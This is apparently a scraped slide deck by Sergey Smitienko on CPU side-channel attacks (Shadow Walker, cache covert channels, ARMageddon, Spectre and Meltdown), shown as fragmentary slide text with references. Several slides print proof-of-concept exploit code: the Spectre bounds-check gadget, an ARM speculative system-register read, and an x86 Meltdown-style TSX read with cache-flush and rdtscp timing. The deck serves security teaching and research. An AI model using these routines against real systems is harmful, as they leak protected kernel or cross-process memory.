Download presentation
Presentation is loading. Please wait.
1
/Сергей Смитиенко/
10
Shadow Walker (2005) MoRE Shadow Walker: TLB-splitting on Modern x
12
Hello From the Other Side SSH Over Robust Cache Covert Channels in the Cloud - 2013
13
ARMageddon: How Your Smartphone CPU Breaks Software-Level Security and Privacy - 2016
15
https://en.wikichip.org/wiki/intel/microarchitectures/skylake_(client)
16
mov rax, 1 add rax, 1 mov [1], rax mov rax, 2 add rax, 2 mov [2],rax
![mov rax, 1 add rax, 1 mov [1], rax mov rax, 2 add rax, 2 mov [2],rax](http://slideplayer.com./slide/16296869/95/images/16/mov+rax%2C+1+add+rax%2C+1+mov+%5B1%5D%2C+rax+mov+rax%2C+2+add+rax%2C+2+mov+%5B2%5D%2Crax.jpg "mov rax, 1 add rax, 1 mov [1], rax mov rax, 2 add rax, 2 mov [2],rax")
17
if (x < array1_size) y = array2[array1[x] * 256];
![if (x < array1_size) y = array2[array1[x] * 256];](http://slideplayer.com./slide/16296869/95/images/17/if+%28x+%3C+array1_size%29+y+%3D+array2%5Barray1%5Bx%5D+%2A+256%5D%3B.jpg "if (x < array1_size) y = array2[array1[x] * 256];")
18
jmp eax jmp [eax] jmp dword ptr [0x01dec0de] ret
![jmp eax jmp [eax] jmp dword ptr [0x01dec0de] ret](http://slideplayer.com./slide/16296869/95/images/18/jmp+eax+jmp+%5Beax%5D+jmp+dword+ptr+%5B0x01dec0de%5D+ret.jpg "jmp eax jmp [eax] jmp dword ptr [0x01dec0de] ret")
20
https://github.com/lgeek/spec_poc_arm/
// void spec_read(void *probe_buf, void *miss_buf, int bit); .global spec_read .func spec_read: LDR X1, [X1] NOP // replaced with MRS X3, SYSTEM_REG LSR X3, X3, X2 AND X3, X3, #1 ADD X0, X0, X3, LSL #12 LDR X0, [X0] RET .endfunc
21
$ ./dump_sys_regs ACTLR_EL1 : 0x0 ACTLR_EL2 : 0x73 ...
TTBR0_EL : 0xf89f0000d TTBR0_EL : 0x0 TTBR0_EL : 0x30010b00 TTBR1_EL : 0x8133f000 TTBR1_EL : 0x0 VDISR_EL : 0x0 VSESR_EL : 0x0 VTCR_EL : 0x VTTBR_EL : 0x0 AFSR0_EL : 0x0 AFSR1_EL : 0x0 AMAIR_EL : 0x0 CNTFRQ_EL : 0x1dcd650 CNTHCTL_EL : 0x3 CNTHP_CTL_EL : 0x0 CNTHP_CVAL_EL : 0x0 CNTHP_TVAL_EL : 0x65a29ee7 (dynamic?) CNTHV_CTL_EL : 0x0 CNTHV_CVAL_EL : 0x0 CNTHV_TVAL_EL : 0x0 CNTKCTL_EL : 0xc6 CNTKCTL_EL : 0x0 ...
23
asm_test_sig(unsigned char* target) { register int mix_i,i,j;
register unsigned x; unsigned hit[256]; unsigned long time_read; unsigned junk; i = pread(fd, buf, sizeof(buf), 0); for (i = 0; i < 256; i++) hit[i] = 0; j = 100; do { for (i = 0; i < 256; i++) _mm_clflush( & test_arr[i*PSIZE] ); _asm_spec_read(target, test_arr); for (i = 0; i < 256; i++) { mix_i = ((i * 167) + 13) & 255; x = mix_i * PSIZE; time_read = _asm_time_read(&test_arr[x]); if (time_read < 100) { hit[mix_i] ++; } j--; } while (j > 0); ... ; rdi : base pointer _asm_time_read: push rbx xor rbx, rbx rdtscp ; edx = hi, eax = lo, ecx = junk mov ebx, edx shl rbx, 32 mov ebx, eax ; rbx = timestamp counter mov eax, [rdi] rdtscp shl rdx, 32 xor edx, edx or rax, rdx ; rax = timestamp counter sub rax, rbx pop rbx ret ; rsi : test_arr _asm_spec_read: xor rax, rax xor rcx, rcx xbegin ABORT_SPEC_READ spec_retry: %rep add rax, 0x141 %endrep jz spec_retry movzx eax, byte [rdi] shl eax, 12 movzx ebx, byte [rsi + rax + 1] xend ABORT_SPEC_READ:
25
Intel® 64 and IA-32 Architectures Software Developer’s Manual
Intel® 64 and IA-32 Architectures Software Developer’s Manual Intel® 64 and IA-32 Architectures Optimization Reference Manual Clémentine Maurice Arm Processor Security Update Meltdown Proof-of-Concept Spectre & Meltdown Checker Meltdown & Spectre PoC for OpenBSD ARM Meltdown PoC - This presentation.
26
skype: sergey.smitienko, FB, LinkedIn
Similar presentations
